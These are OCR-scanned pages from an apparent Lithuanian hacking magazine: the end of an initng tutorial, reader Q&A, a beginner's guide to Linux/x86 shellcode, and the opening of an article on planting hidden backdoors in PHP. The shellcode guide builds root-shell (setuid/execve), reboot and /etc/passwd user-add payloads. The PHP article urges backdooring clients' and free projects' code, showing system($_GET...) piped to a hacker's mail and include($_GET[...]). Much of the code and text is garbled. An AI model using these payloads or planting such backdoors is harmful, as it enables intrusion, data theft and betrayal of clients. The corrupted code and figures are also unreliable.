redaguodamas lygių bylas, tu turi aiškiai suprasti, ką darai. Jeigu 
dėl kažko nesi tikras, pasinaudok ng-update — šią programą mes 
aptarsime kiek vėliau. 


Li bylos] Prieš pereinant prie .i bylų formato aptarimo, reikia 
žinoti, kokius servisų tipus galima aprašyti šiose bylose. Servisai 
būna trijų tipų: demonai (daemon), servisai (service) ir virtualūs 
servisai (virtual). 

Demonas pasileidžia ir po paleidimo neužbaigia savo darbo, o 
lieka operatyvinėje atmintyje. Jis gali įgauti vieną iš dviejų statusų 
— RUNNING, kas reiškia, kad demonas normaliai veikia, arba 
FAIL STARTING -— demono paleidimas baigėsi su klaida. Jeigu 
demono paleidimo metu įvyko sutrikimas, tuomet bus sustabdyti 
visi nuo jo priklausomi servisai. 

Servisas pasileidžia, atlieka savo darbą (pavyzdžiui, sumontuoja 
failų sistemas arba užkrauna sisteminį šriftą) ir baigiasi. 
Virtualus servisas iš viso nieko nedaro, jis tiesiog priklauso nuo 
kitų. Jeigu „virtualas“ užkrautas, tuomet gali būti tikras — paleisti 
visi servisai, nuo kurių jis priklauso, Kaip pavyzdį aptarkime bylą 
daemon/httpd.i: 


daemon daemon/htipd 4 
need = systenyboommis; 
teguite. netvark; 
use = daemon/sshd daemon/mysą! daemon/postgres systen/netmoun!; 
sxec daemon = /ust/sbin/htipd; 
pid file = /vavtun/httpd.pid; 
1 


Raktinis žodis daemon kalba pats už save: httpd -- demonas. Initng 
servisus skiria ne pagal bylos pavadinimą, o pagal identifikatorių, 
kuris pateikiamas po tarnybinio žodžio daemon (service/virtuai), 
kas leidžia aprašyti kažką panašaus į: 


daemon daemorVagetty/“ ( 
need = system/hoolnisą; 
onv DEV PRĖ- ly; 
exec daemon = /sbin/ogetty 38400 S4DEV PRE)SNAME); 
1espovn; 


) 


Sugrįžkime prie mūsų htipd. Direktyvos need ir use leidžia aprašyti 
priklausomybes (apie tai mes pakalbėsime kiek vėliau). Demonui 
httpd reikalingas tinklas, atitinkamai čia mes neapsieisime be 
reguire-network. Exec nurodo vykdomą serviso (demono) bylą. 


Bylos pavadinimas su unikaliu serviso proceso identifikatoriumi 
nurodomas su pid. file. 


Atkreipk dėmesį į direktyvas ENV ir respawn. Pirmoji naudojama 
aplinkos kintamųjų sukonfigūravimui, o antroji perleidžia servisą 
avarinio jo užbaigimo atveju. 


Aš neatsitiktinai čia pateikiau serviso-demono agetty listingą. 
Atkreipk dėmesį į direktyvas ENV ir respawn. Pirmoji naudojama 
aplinkos kintamiesiems sukonfigūruoti, o antroji perleidžia servisą 
avarinio jo užbaigimo atveju. 


Priklausomybės ir konfliktai] Direktyva need parodo tuos servi- 
sus, nuo kurių priklauso aprašomas servisas. Jeigu šie servisai 
nebuvo paleisti, tai prieš aprašomo serviso paleidimą initng paleis 
viską, ką tu nurodei su need. 

Direktyva use naudojama kitaip: ji tiesiog nurodo, kokius servisus 
gali panaudoti ir mūsų servisas. Jeigu jie nepaleisti, initng jų taip 
pat nepaleidinės. Direktyva use naudojama tam, kad būtų galima 
apibrėžti servisų paleidimo tvarką. Ši informacija įvertinama prided- 
ant servisus į reikiama lygį su ng-upaate. 

Direktyva conflict Ieidžia apibrėžti servisą, su kuriuo konfliktuoja 
mūsų servisas. Pavyzdžiui, wu-fipd gali konfliktuoti su ProFTPD, o 
sendmail — su postfix. Sistemoje negali būti dviejų servisų, kurie 
atlieka vienus ir tuos pačius veiksmus. 


[NGC ir NG—UPDATE] Pirmasis įrankis naudojamas serviso 
paleidimui/sustabdymui (service analogas init atveju), o antra- 
sis — serviso pridėjimui į nurodytą paleidimo lygį. Sintaksė: 


veiksmas> < saivisas > 
= veiksmas > < servisas > 


ng 
Nvupdalė < paleidimo Iygis> 
Aptarkime keletą pavyzdžių: 

ngc —u hiipd — htipd paleidimas 

ngc d htipd hittpd sustabdymas. 

nac —h — pogalba 


* į default lygi pridedame net/pppO paleidimą */ 
ng-update add net/pppO detali 

" iš default pašaliname net/eih] paleidimą */ 
ng-updote del net/ethl default 


[Initng ir X'ai] Negalima nepaminėti, kad initng šiek tiek 
konfliktuoja su X Window sistema. Tai susiję su nauja pelės ini- 
cializavimo sistema, kuri vadinasi ne /dev/mouse, o /dev/psaux 
(taip ir turi būti), todėl. jei būtina, reikia šiek tiek pakoreguoti 
XFree86/XOrg konfigą. Ir dar: jeigu pas tave kompiuteryje 
įdiegta nVidia vaizdo plokštė, teks šiek tiek „paburti“ su nVidia 
tvarkyklėmis (išsamiau apie tai sužinosi initng-0.5.3/doc/in- 
itng.txt byloje). 


[Diagnozė] Būsiu lakoniškas: initng ne tik galima, bet ir reikia 
naudoti. Žymiai sutrumpėjo sistemos krovimosi laikas, atsirado 
daugiau servisų paleidimo konfigūravimo galimybių, kadangi 
Initng daug lankstesnė už savo pirmtakę. Initng nėra sudėtinga 
sistema, tiesiog iš pradžių darbas su ja gali pasirodyti kiek 
neįprastas. Jeigu iškils sunkumų — rašyk, o aš tau patarsiu, 
ka ir kaip reikia daryti. 


Straipsnyje „Pabėgimas iš VMWare“ buvo rašoma 
apie tai, kaip ištrūkti iš virtualios mašinos. Man 
iškilo kiek kitoks klausimas: kaip nepaleidžiant 
virtualios mašinos iš pagrindinės sistemos įtakoti 
viešinčią 0S? VMWare kiekvienai virtualiai mašinai su- 
kuria specialias bylas — galbūt tai būtų galima padaryti 


per jas? 

Ilgai šios bylos formatas buvo saugomas paslaptyje ir 

tik neseniai gamintojai jį paviešino. Viskas, ko reikia, 

aprašyta VMDK (Virtual Machine Disk Format) specifikacijoje, 

kurią gali parsisiųsti iš čia: www.vmware.com/interfaces/vmdk. 

html. Be pačios VMware kol kas nėra gatavų produktų, kurie 

būtų skirti dirbti su šiais atvaizdais. Galbūt tu parašysi tokią 
programinę įrangą? 


A: Iš tiesų, kiekvienai virtualiai mašinai VMWare sukuria 
bylą-atvaizdą, kurioje saugoma informacija apie virtualų 
kietąjį diską, jo particijas, esančius duomenis ir t.t. 


Sakoma, kad viešuose šaltiniuose pateikiami proxy 
serveriai yra juodame sąraše. Ar toks sąrašas iš 
tiesų egzistuoja? 


A: Savaime suprantama, kad taip. Jeigu egzistuoja 

ProxyList Grabber (www.thalliumtech.com) tipo progra- 

mos, kurios iš viešų šaltinių išgauna slaptuosius proxy 

serverius ir nufiltruoja dublikatus, tai kodėl gi analogiškų 
priemonių nepanaudojus juodųjų sąrašų sukūrimui? Taigi tokie 
juodieji sąrašai aktyviai sudarinėjami, juos naudoja elektroninių 
mokėjimų sistemos, kurios taip seka mėgėjus išlikti inkognito. 
Sužinoti, ar tavo proxy yra juodajame sąraše, gali čia: Www. 
whois.sc. 


Nm“ 


FERRUM 


Š 

E 

3 

z 

5 

ž 

Š 

ž 

: | 060 

EA 
Juodoji magija 
pradedantiesiems 

š Shellkodo kūrimas 

e] „Linux/x86“ sistemai ir pavyzdžiai 

E PERŽIŪRĖDAMAS EKSPLOITŲ IŠEITIES 
TEKSTUS TU TIKRIAUSIAI NE KARTĄ 
MĄSTEI, KAS GI YRA TOS TARP DVIGUBŲ 
KABUČIŲ ĮSPRAUSTOS MAGISKOS 
RAIDELIŲ IR SKAIČIUKŲ SEKOS. VISA 
TAI VADINAMA VIENU VARDU — SHEL- 
LKODAS. TAIP TAI TAS PATS KODAS, 
BE KURIO HAKERIS — NE HAKERIS, O 

= PAZEIDZIAMUMAS — VISO LABO DDOS'0 

ž GALIMYBE. SIAME STRAIPSNYJE, REM- 
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Shellcode — tai tam tikra baitkodo seka, kuri paleidžia vieną ar 
kitą sistemos funkciją. Shellkodas jokiu būdu neturi apsiriboti 
sistemos aplinkos (komandinės eilutės aka shello) paleidimu:, jį 
galima išmokyti daryti ką tik nori — galimybės čia priklauso tik nuo 
autoriaus vaizduotės ir patyrimo. 

Paprastai shellkodas rašomas su asembleriu, kas naujoku! jau 
savaime ne visada lengva, tačiau aš pasistengsiu pateikti tikslius 
apibrėžimus, kad net ir mašininės kalbos niekada nemačiusiam 
naujokui būtų aišku, kaip parašyti paprasčiausią shellkodą ir jį 
panaudoti savo taikiais tikslais. 


[Funkcijos iškvietimas] Prieš pradedant rašyti shellkoda, reikia 
išsiaiškinti, kaip Linux sistemoje iškviesti vieną ar kitą 
funkciją. Jeigu Windows sistemoje tam reikia kankinančiai ilgai 
ieškoti milijono skirtingų adresų, tai čia viskas labai paprasta. Bet 
kuri sisteminė funkcija iškviečiama trimis etapais: 

1. Į EAX registrą įrašomas sisteminio iškvietimo numeris: 

likusius registrus įrašomi parametrai (iš kairės į dešinę) 
Iškviečiamas sisteminis pertraukimas 80h. 


3. 


[lr jokio vargo su adresais, kaip langinėse.] Pabandykime iš 
pradžių parašyti paprastutį iškvietimą, kuris nedaro nieko daugiau, 
o tik išeina iš programos. Norėdamas sužinoti, kokį numerį reikia 
perkelti į EAX registrą, tiesiog žvilgtelk į /usr/include/asm/unistd..h. 
Šioje byloje saugomi visų sisteminių iškvietimų numeriai. Nesunkiai 
atkasam jo numerį, tačiau čia iš karto tenka susidurti su kita prob- 
lema: vien tik iškvietimo numerio maža. Mums taip pat reikia žinoti, 
ka įrašyti | likusius registrus, t.y. kokie iškvietimo parametrai. Norint 
atsakyti į šį klausimą, reikia pasinaudoti nuostabia *nix'ine komanda 
man. Perduok jai vietoje argumento „2“ ir reikiamo iškvietimo 
pavadinimą, ir tau bus pateiktas pilnas iškvietimo aprašymas; 


bash-2.0554 man 2 exit 


Mes matome, kad funkcijai exit reikia viso labo vieno int tipo 
parametro — išėjimo kodo. Puiku! Dabar mes galime pradėti 
rašyti kodą: 

bash-2.055 cat exitasm 

mv 60, 

im 80h 


Čia mes į EAX registrą įrašysime sisteminio iškvietimo numerį Ir 
atliksime patį iškvietimą. Štai ir visas exit kodas (šiaip tai kiek aš 
supratau, dėl viso pikto taip pat reikėtų nunulinti ir ebx registrą, 


kad išėjimo kode neatsidurtų kokia nors atsitiktinė reikšmė — red 
past.). Dabar kompiliuojame: 
bosh-2.05b34 nasm  folf eilo 
bush-2,05b74 
warning: cannot find entry symbol start; defaulting to 0000000008048060 
Matome vieną perspėjimą (warning), kuris byloja apie tai, kad 


neapibrėžtas start, tačiau, nepaisant to, viskas teisingai susikom- 
piliavo ir susikomponavo. Dabar paleidžiam: 


hash 2.05b7P exit 
bash-2.05b+ 


Programa baigėsi korektiškai, o kad tuo įsitikintume, pasinau- 
dosime specialiu labai naudingu įrankiu — strace. Jam vietoje 
parametrų reikia nurodyti tiriamos programos pavadinimą: 


bash-2.05b+ė sirace /exit 

oxecve(“/exit", |"/exl"], |/ 45 vas */|) 0 
ai0) = ? 

bash-2.05b+ 


Matome, kad viskas įvyko būtent taip, kaip mes ir planavome. 
Įsitikinus, kad mūsų parašyta programa veikia teisingai, mes ją 
paversime į kodo baitų rinkinį, t.y. į specifinį shellkodą. Pasinau- 
dosime įrankiu objdump su vėliavėle d: 


bash-2.05b74 abjdump d eit 
axit: file format elf37-i386 
Disassembly ol section „Iext: 
08048080 < Jet > 


8048080. 68 01 00 00 00 mov Š0x1 Ben 
8048085; cd 80 int 50480 
bash-2.05b 4 


Štai mes ir gavome mūsų pirmają magiškąją seka. Tačiau čia yra 
vienas mažas BET. Mūsų shellkode pilna nulinių baitų, o jų neturi 
būti, kadangi C kalboje kopijuojant simbolius šis ženklas (00) reiškia 
eilutės pabaigą. Yra didelė tikimybė (10096), kad mūsų shellkodas 
bus bevertis, 0 ir paties shellkodo dydis su nuliais padidėja, tuo 
tarpu dydis, kaip žinia, yra svarbu. Kaip gi atsikratyti tų nulių? 

Tai lengva užduotis. Tam, kad sisteminio iškvietimo numerį įkeltume 
į registrą ir tuo pačiu neišprovokuotume nulių atsiradimo, reikia iš 
pradžių suxorinti registrą, o po to įkelti duomenis į jaunesniuosius 
šio registro baitus. 

Remdamiesi šiuo principu, sutvarkykime mūsų exit-shellkodą: 


bash-2.05b cai exit asm 


LUS BOX, E0X 
mov Ol 
mo 80h 


Šiame kode mes iš pradžių išvalome EAX registrą, otaca į AL įkeliame 
sisteminio iškvietimo numerį ir iškviečiame pertraukimą. 


hash-2.05b2* nosm  fel! exitasm -0 erito 
bash-2.05b7ė Id exito 0 eit 

Id: Warning: cannot ind enty symbol 
Jo: 0000000008048080 

bosh-2.05b A Jonit bash-2.05b 
bash-2.05b7* strace /exil 

aeoe[“ est", |*/ext'], V“ 45 vas A) = 0 
adi(0) = ? 

bash-2.05b74 


star; deiouling 


Patikrinome, kad viskas puikiai veikia. Dabar su objdump vėl 
išveskime baitkodą: 


bash-2.05b+4 objdump -d ast 


exit: lile format elf32-i386 
Disossembly of sedion text: 
08048080 < Jex!>: 


8048080: 30 x0! Yaenx Obeax 
8048082: 6001 mo S041,Yoal 
8048084: cd 80 int 5080 
basl-2.05b£ 


Ir iš tikrųjų, dabar mūsų baitkode nėra nulių, o ir dydis sumažėjo, 
kas negali nedžiuginti. Beje, vietoje negražaus mov al,1 galima 
naudoti inc al (tokia instrukcija vienu baitu mažesnė — red.past.), 
kas daug geriau estetiniu atžvilgiu. Vietoje xor taip pat galima 
naudoti sub, tačiau čia jau skonio reikalas — kas kaip moka, tas 
taip šoka. Kaip eksperimentą peržvelkime dar vieną nesudėtingą 
shellkodo pavyzdį: 


bash-2.05b* cat pausė.asm 


xor 604 EOX 
mov 029 
int 801 


Išvalome EAX, tada į AL įkeliame sisteminio iškvietimo numerį ir 
iškviečiame pertraukimą. Kompiliuojam, strace'inam ir gauname 
baitkodą: 


STRACĖ: 
exewel“ /pause", ["/pause“), [/ 45 vas "/) = 0 
pause( < unlinished „> 


BCODE: 

8048080: RO Vneax, Vbeax 
8048082: b0 Id mov ŠOxid ?hal 
8048084: a 80 int 5060 


Šis shellkodas iškviečia sisteminę funkciją pause, kuri lauks, Kol 
tu nuspausi <Ctrl+C>. Puiku, tiesa? O juk tai galėjo būti ir kokia 
nors ne tokia nekalta funkcija. 


[Džentelmeno rinkinys] Norint įgyvendinti visus straipsnyje 
aprašytus dalykus, tau prireiks: 

1. Linux — mašinos su jame įdiegtu pingvinu 

2. NASM (http://sourceforge.net/projects/nasm) — 
Intel sintakse 

3. LD — standartinio linkerio 

4. Objdump — baitkodo peržiūros įrankio 

5. Strace — iškvietimų peržiūros įrankio 


asemblerio su 


Visa tai gali gauti praktiškai kiekvienuose namuose, todėl apsirūpinti 
reikiamais įrankiais tikrai nesudėtinga. 


[LEVEL UP: REBOOT] Dabar mudu sukursime magiškąjį 
perkrovimą, kuris akimirksniu perkraus tavo OS ir sunaikins visus 
neišsaugotus duomenis. Tuojau paaiškinsiu kodėl. Visų pirma, tu 
juk nesiruoši išsaugoti kokių nors nesvarbių serveryje (kuris yra 
tavo tikslas) saugomų laikinų duomenų. Antra, kad duomenys būtų 
išsaugoti, reikia pridėti porą papildomų (syn() syn()) iškvietimų, 
kas turės įtakos shellkodo dydžiui. Tiesiog mašinos perkrovimui 
Skirtas specialus ir universalus iškvietimas reboot. Priklausomai 
nuo jam perduotų parametru jis naudoją vieną ar kita perkrovimo 
metodą. Pavyzdžiui, norint tiesiog be jokių papildomų klausimų 
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spėjimų perkrauti mašiną, į EBX, EOX ir EDX registrus reikia 
perkelti tokius parametrus: pirmą magišką žodį, antrą magišl 
žodį. specialią vėliavėlę. Aš nejuokauju, dokumentacijoje iš tiesų 
rašoma apie du magiškuosius žodžius, kurie turi būti perduoti kaip 
pirmi du parametrai. O vietoje trečio turi būti perduodama speciali 
integer tipo vėliavėlė, kuri iš esmės ir nurodo, kaip turi veikti mūsų 
reboot: tiesiog persikrauti, nieko nedaryti, ar išvesti system halted 
tipo pranešimą, ar išjungti kompiuterį. Pirmas atvejis: 


aix0123 
L d,88 
i BO 


Iš pradžių standartiškai išvalomas EAX registras, po to į EBX ir 
ECX registrus perkeliami magiškieji skaičiai, o į EBX — speciali 
vėliavėlė 
Iš tokio paprasto kodo gaunamas štai toks Shell kodas: 

431 xD ybb Ya 


vel vie 


969 XP 512428 yba 67 


423401 50458 edyBO 


Nors jis ir nėra didelis (21 baitas), tačiau kokia žudikiška jėga! Jeigu 
žvilgtelėtumei į dokumentaciją (manual! pages), tuomet ten pamatytum. 
kokias dar vėliavėlės reikšmes galima perduoti. Jeigu nori pasipraktikuoti, 
gali, pavyzdžiui, parašyti kompiuterio išjungimo programą. 


[Bendros paskirties registrai] Norint programuoti su asembleriu 
pakanka viso labo keturių bendros paskirties registrų 
ECX, EDX. Tai 32 bitų registrai, t.y. juose gali būti saugomi net 4 
baitai. Jeigu reikia panaudoti ne visus 32 registro bitus, o, tarkim 
tik 16 ar 8, tuomet naudojami šie registrai: AX, BX, CX ir DX (16 
bitų, be priešdėlio „E“) bei jų puselės: AH, AL, BH irt.t 


16 bit 8 bit (h) 8 bit (I) 
A M A 
B i 


[Owned By Me!] Nesilyginsime su pradedančiaisiais programuo- 
tojais ir nerašysime hello world, geriau parašykime Owned 
:). Iš pradžių mums reikia sužinoti, koks sisteminis iškvietim, 
išveda eilutę. Žvilgtelėjus į unistd.h, galima lengvai surasti funkciją 
write — greičiausiai tai yra būtent tai, ko mums reikia. Įsimink 
jos numerį 4, dabar žvilgtelėkim į man 2 write, kur matome, 
kad funkcija reikalauja trijų parametrų: išvedimo deskriptoriaus 
rodyklės į duomenis ir duomenų dydžio, Ly. reikės užpildyti EBX 
ECX ir EDX registrus. EAX registre turi būti saugomas iškvietimo 
numeris — 4. 

Jeigu visa tai suvirškintume Ir panaudotume savo programoje 
gaunasi toks kodas: 


dą 
push 

push 

Šu r 
[ 

push d By 
push Owne 
mav BOLėSP 
in 

mv ad 
mov dl, 12 
it 80h 
Nor 00KA 
jų 

int 80h 


Su pirma komanda mes nunuliname EDX, o su keturiomis 
kitomis EAX ir EBX. Toliau į steką įkel atbuline 
tvarka po 4 baitus) ir visa tai išsaugojame ECX registre (antrasis 
write parametras). Vienetu padidiname BL, kadangi tai pirmasis 
parametras (1 = išvesti į standartinį išvedimo srauta, stdout), į AL 
įkeliame sisteminio write iškvietimo numerį, oj DL mūsų eilutės 
Igi, po ko valdymą perduodame branduoliui ir išeiname. Jeigu 
nedarytume exit, tuomet kodas būtų įvykdytas, tik po to alsir 
Segmentation Fault tipo pranešimas, kas nėra pageidautina 
Po objdump gauname štai tokį shellkodą: 


ne eilutę 


52458 


09 
UA 


W68 20 dd 
v6B 64 20Y42479" 
Vė8V30M 


vi 


WbŪOA 
vedx8043 O 
le weOycd48O 


36 baitai... Shellkodui tai santykinai nedaug. Tą paųį kodą galima 
perrašyti kiek kitaip, skirtingai išsaugojant duomenis (ne visada 
patogu perkėlinėti eilutę į steką): 


jįmp short dat 
nai 
nush | edk 
pop EūK 
iš: AK 


d By Mel Oka 


Pirmoje eilutėje peršokame į žymę dat, čia iškviečiame žymę main. 
Taip pas mus steke išsaugojamas mūsų eilutės adresas (juk ca! 
į steką įkelia po jos einančios instrukcijos adresą). Pagrindinėje 
funkcijoje iš steko išimame paskutinę reikšmę ir išsaugojame 
kaip antrajį write iškvietimo parametrą. Toliau eina mano jau 
aprašytas kodas. Gauname tokį shellkodą (4 baitais daugiau, 
kadangi naudojami jmp ir call iškvietimai) 


459499 5245845046H 
c3ybOV04Yh2YOd 
vedv80N3T Ode) 
ved BOeB ve TNN" 
v30W77ybex65 642044 279" 
+20y4dx65421 400 


Dabar, kai tu jau moki išvedinėti tekstą, laikas pereiti prie dažniausio 
ir praktiškiausio shellkodo panaudojimo. 


ĮVykdome „execve“] Norint "nix sistemoje paleisti tam tikrą programą, 
reikia pasinaudoti funkcija execve, tam į EAX reikia įrašyti 11 arba Oxb. 
Exewve reikia perduoti tris parametrus: rodyklę į pilną iškviečiamos 
programos kelią, rodyklę į iškviečiamos programos pavadinimą su 
argumentais ir rodyklę į env (į env mes, ko gero, spjausim). 

Ką gi, pradėkim! 


atn Open Uncrpynenta Giniakoc Ergepa Dio Capas 


023 + 06 R>+<8 ae “0 


Tap short dt 


pop 60 
push eax 
push n/sh“ 
push Ai 
mov ebyesp 
push e0x 
push ebų 
mov e0,eSp 
mov Odxb 
int 80h 


Šiame kode mes iš pradžių nunuliname EDX ir EAX registrus, poto 
į steką įrašome mūsų iškviečiamos programos pavadinimą su nuliu 
kaip užbaigiančiuoju simboliu. Po to mes iš steko išimame reikšmę 
ir įkeliame ją kaip pirmąjį parametrą. Tolimesniame etape mes į 
steka įrašome antrąjį parametrą ir nulį, t.y. gauname savotišką 
masyvą, po ko visą jį įkeliame į ECX (antrasis parametras). | AL 
įrašome sisteminio iškvietimo numerį ir atliekame patį iškvietimą. 
Šis nesudėtingas asemblerio kodas pavirsta štai tokiu shellkodu: 


"409462468 450" 

68 be INT 68" 

NBNLN2N626O" 

AxB9 ye 505539" 

kel EONŪb ed B0" 
Baitkodas pakankamai trumpas — 24 baitai. Shellkodui tai visai 
priimtina. 
Čia nereikia iškviesti exit, kadangį vykdymo metu valdymas perduo- 
damas /bin/sh. Kad shelikodas būtų iš tiesų efektyvus, prie jo reikia 
„prisukti“ setuid(). Setuid — tai sisteminis iškvietimas, kuris einamo 
vartotojo UID pakeičia į vietoje iškvietimo parametro perduotą UID: 


Koro O04GUK 
x0r ob, obx 
mov al0x17 
int 801 
lų 

push 

push 

pust 

pust 

pop 

push e0N 
push ebx 
push esp 
pop 60 
mov alOxb 
int 80 


Šis kodas praktiškai nesiskiria nuo ankstesnio. Tiesiogjo pradžioje 
prisidėjo setuid iškvietimas. Gautas shellkoda: 


BT OY3T Vdb OY 7 a LE0VB 50" 
AK6B do 2473 6868 ZN2AK6NK6O" 
ABA 5OY53354459 O Ob ed BO", 


30 baitų 
rimčiausio mūsu shellkodo parašymo 


tai nėra blogai. Manau, kad dabar metas imtis paties 
user add. 


63] 


HAKERIS 407 [38] 06 


[LOGIN: GOD] Siame shellkode mes turėsime dirbt iš karto su 
keturiais sisteminiais iškvietimais: open, write, close ir exit. Pirmasis 
iškvietimas su tam tikrais parametrais atidarys slaptažodžių bylą 
etc/passwd), antrasis ten pridės naują eilutę su mūsų naujojo var- 
totojo parametrais, trečiasis iškvietimas uždarys bylą, o paskutinis 
ketvirtasis iškvietimas korektiškai išeis iš programos. Pirmyn! 


80 
L Bi 


labar apie viską išsamiau. Pradžioje mes su jau įprastinėmis 
instrukcijomis nunuliname mūsų naudojamus registrus ir į steką 
įrašome redaguojamos bylos pavadinima. Pavadinimo pabaigoje 
yra taškas, kuris čia yra todėl, kad shellkode nebūtų nulių. Toliau 
kode šis nereikalingas simbolis pakeičiamas nuliu, kad sisteminiai 
kvietimai matytų eilutės pabaigą. 

) to mes pirmąjį open iškvietimo parametrą įkeliame į EBX, 
o antrąjį parametrą — į ECX (0x441 pažiūrėk į parametro 
specifikaciją), o į AL mes turime įrašyti sisteminio iškvietimo 
numerį — 5. Po to iškviečiame int 80h 

Toliau mūsų laukia antrasis iškvietimas, kurio parametruose tu 
jau galėsi susigaudyti ir pats. Tačiau iš pradžių mes į EBX įrašome 
EAX registro turinį, kadangi iškvietus open parametras išsaugomas 
EAX registre, o kitam iškvietimui reikia, kad jis būtų EBX registre. 
Mes ištriname nereikalingą simbolį (x), tik šį kartą tai padarome 
su eilutės perkėlimo ženklu (Oxa). Sudėliojame standartinius 
parametrus, apie kuriuos aš tau jau aiškinau pavyzdyje su write, ir 
čiame pertraukimą. Tolimesnis iškvietimas close, kuriam 
bylos deskriptorių 


iškv 
reikia perduoti viso labo vieną parametrą 
EBX). Ir galų gale exit su išėjimo kodu O. 

Tikiuosi, kad tu jau sukompiliavai programą ir gavai shellkodą (vi- 
etos taupymo sumetimais aš jo čia nepateiksiu). Be abejo, jis nėra 


mažas, kadangi shellkode yra 
pakankamai didelės eilutės. 
2 tačiau bendrai paėmus jis 
siliadi normaliai optimizuotas 
Išbandymas 

Norint patikrinti, kaip veikia 

mūsu nuostabieji shellkodai, 

pakanka parašyti trumpą 
C programą, su kuria po to galima atlikti išbandymą. Praktiška 
eksploito šablonas: 


dar į) 
nusu  Sel|-kodo: 


andosi cia? 


Kompiliuok, paleisk, ir jeigu viskas gerai, programa valdymą per- 
duos į mūsų sukurtą ir atmintyje saugomą shelikodą. 


[Pagrindinės asemblerio instrukcijos] Kurdami shellkodus mes 
naudosimės ne pačiu plačiausiu asemblerio komandų rinkiniu. Štai 
viskas, ko mums prireiks: 


InstrukcijoReikšmė 

isi,si ds! įrašo i 
prie dst prideda 
atima: 51 


I 
add dst,s1 
sub 


C reikšme 
veikime. 


,SIC d 


pusl sic įkelia sic į steko Viršūnę 


pop dst | dest įrašo viršuti 


nc reg vienetu padidina ) 
doc ton. vienetu sumažina: registro reikimę (-) 
aa dst,src dsi užkiauna sic adresą 
xdhg dSt,str sukeičia dst ir sic reikšmes 
XI 160164 0 0p su 169 

int num pertraukimo s0 numeriu num imas. 


[Exit(0)] Shellkodų programavimas labai įdomus užsiėmimas: 
vienu metu gali juo žavėtis ir jo nekęsti. Jeigu tau kas nors nepa 
vyksta — nenusimink, o rašyk man, aš pasistengsiu tau padėti 
Štai ir viskas. Linkiu sėkmės ekstremaliuose programavimo ek 
sperimentuose! 


Gvetve: parametrai 


065 


Neatsitiktinės klaidos 
Specialiai darome 

klaidas „php“ skriptuose o 
MES HAKERYJE LABAI DAUG RAŠOME 
APIE TAI, KAIP PROGRAMINIAME KODE 
IEŠKOTI KLAIDŲ, MOKOME TAVE VISOK- 
ERIOPAI APSAUGOTI SAVO PROGRAMAS, 
KAD NĖ VIENAS HAKERIŪKŠTIS PRIE JŲ 
NEPRISIARTINTŲ NĖ PER KILOMETRĄ. 
GALBŪT TAI TAU PASIRODYS KEISTA, 
TAČIAU KARTAIS IŠKYLA BŪTINYBĖ SPE- 
CIALIAI SAVO PROGRAMOJE PALIKTI 
GUDRIĄ KLAIDĄ, KURIĄ SURASTI BŪTŲ 
SUDĖTINGA, O NAUDOTIS — PATOGU. 
ŠIANDIEN AŠ TAVE IŠMOKYSIU DARYTI 
TOKIAS KLAIDAS. 


[Kam to reikia?] Iš tiesų, kam to gali prireikti 
sąmoningai savo kode daryti klaidas? Naivuolis! Priežasčių 
yra daugybė. 

* Užsakovo kontrolė. Įsivaizduok, kad tu dirbi laisvai sam- 
domu programuotoju ir į tave kreipiasi nežinomas žmogus, 
kuris pas tave užsako sudėtingą sistemą. Tu ją parašai, 
tačiau būgštauji, kad jis tave vienaip ar kitaip apgaus. 
Tokiu atveju neįkainojamas dalykas — užsakovo paveikimo 
mechanizmas po darbų pridavimo arba galimybė kaip nors 
kontroliuoti ir įvertinti tavo projekto gyvybingumą. Jeigu tu 
paliksi protingai sukurptą bekdorą, užsakovas amžinai ka- 
bos ant tavo kabliuko: vos tik kas — irtu jam suorganizuoji 
saldžią gyvenimo pamoką! 

* Trojanizuotas projektas. Puiki idėja — parašyti kokią nors 
kietą sistemą ir nemokamai ją platinti. Jeigu projektas iš 
tiesu geras, tai žmonės pas save idiegs tavo skriptus, o tu 
per savo klaidą galėsi juos visus gražiai „padaryti“. 

* Konkretaus projekto nulaužimas. Įsivaizduok, jog 
tau reikia gauti priėjimą prie kokio nors projekto. Tokiu 
atveju galima parašyti kokį nors patogų nedidelį skriptą 


sų mažyte grakščia klaida, kurią pastebėti oi kaip nepaprasta. Po 
to tu gali pasinaudodamas socialine inžinerija priversti projekto 
administratorių savo serveryje įdiegti šį skriptą tarkim, jį su- 
domino tavo skripto galimybės, tu jį įkalbi išbandyti naują produkta 
arba pasiūlai „nenulaužiamą phpBB versiją, kurią testavo geriausi 
pasaulio hakeriai ir joje išgaudė visas klaidas“. 

Priežasčių, dėl kurių web programuotojui visada naudinga mokėti 
į savo projektą įsiūti porą klaidų, yra daug. Dabar metas ir tave 
išmokyti, kaip tai padaryti gražiai ir dailiai. 


[Gražiai ir saugiai] Atrodytų, kas gali būti paprasčiau, nei sukurti 
klaidą ir taip palikti skylę? Kaip tu tikriausiai pagalvojai, viskas 
išsprendžiama su viena iš šių eilučių: 


system(s GE /ock amt“); 


+ abi: 
syson('edho S GEI[hak mg] | mai hackeredsiporsLgo"; 
+ ale 


indude($ GET[fiename)), 


Tačiau pagalvok, kas bus, jeigu tu šią eilutę pridėsi į savo skriptą. 
kuris susideda iš vos 20 eilučių. Bet kuris darželinukas per 10 
sekundžių nuo išeities teksto atidarymo tau pasakys, kad šio skripto 
jis pas save nedės ir geriau nueis į google paieškoti projektų su jau 
įdiegtu tavo skriptu, Taigi aukščiau pateikti pavyzdžiai priskiriami 
kategorijai „kaip nereikia daryti“. 

Ir dar vienas niuansas. Labai svarbu, kad suradus tavo skylę ji 
atrodytų ne kaip specialiai paliktas bekdoras, o būtų panaši į 
paprasčiausią klaidą arba bent jau būtų paslėpta taip, kad ja būtų 
Keblu surasti. 

Beje, gana įvadinės dalies, pereikime prie sprendimų. Visų pirma, 
aš tave išmokysiu į savo skriptus įterpti gudrius bekdorus, antra, 
išmokysiu daryti naivias klaidas. Kaip tu greitai suprasi, norint daryti 
klaidas, galvoje reikia turėti pakankamai pilkosios masės :). 


[Bendros idėjos] Pirmiausia reikia apgalvoti, kur ir kaip mes 
įkurdinsime savo klaidas. Jų forma ir turinys — atskira šneka. Dabar 
nuspręskime, kokioje programos vietoje mes jas slėpsime. Bet kuri 
php sistema paprastai susideda iš daugybės bylų. Tokiose sistemose 
visada būna keletas bylų su klasių arba funkcijų aprašymais — šie 
aprašymai tiesiog prijungiami (include) prle skriptų, kuriuose nau- 
dojamos aprašytis klasės ir procedūros. Mūsų klaidas geriausia 
būtų paslėpti būtent bylose su funkcijų aprašymais, kadangi jos 
dažniausiai būna gana didelės apimties, o rankiniu būdu surasti 
vieną kenksmingą eilutę sudėtinga. 

Būtų kieta, jeigu mums pavyktų apsieiti be tokių „hakeriškų“ 
